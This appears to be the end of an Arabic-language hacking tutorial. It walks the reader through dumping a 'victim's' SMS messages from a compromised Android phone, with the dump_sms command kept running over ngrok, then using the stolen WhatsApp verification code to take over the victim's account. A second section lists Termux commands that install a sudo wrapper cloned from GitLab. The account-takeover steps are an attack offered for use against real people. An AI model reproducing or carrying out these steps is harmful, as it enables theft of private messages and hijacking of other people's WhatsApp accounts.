→ الان رح تحملوا واتساب وتحطوا رقم الضحيه انتر بيوصله الكود عند الضحيه #اكتب هاي الاوامر لاختراق رسايل الضحيه ↓

→ dump_sms

←الان رح يطلع لكم ملف بصيغه txt فيها كل الرسائل الي عنده حط امر exit وبعدها ls لاظهار الملفات بتحصل الرسائل في ملف txtلاظهار الرسايل الي في الملف ↓

←حط امر cat 99999.txt

←غير كلمه.99999.txt اسم الملف الي رح يطلع لك بتحصل الكود الي وصله بتنسخه وتروح الواتس تكتبه ومبروك عليك الاختراقط

#ملاحظه تبقى اداه ngrok شغاله لاخر الاختراق

♥انشاء الله يكون الشرح واضح ❤

اوامر الروت للترموكس termux

اعطاء صلاحيات الروت لبعض الادوات التي تحتاج روت

الاوامر

apt update

apt upgrade

pkg install git

pkg install ncurses-utils

git clone https://gitlab.com/st42/termux-sudo

ls

cd termux-sudo

ls

cat sudo > /data/data/com.termux/files/usr/bin/sudo

chmod 700 /data/data/com.termux/files/usr/bin/sudo

sudo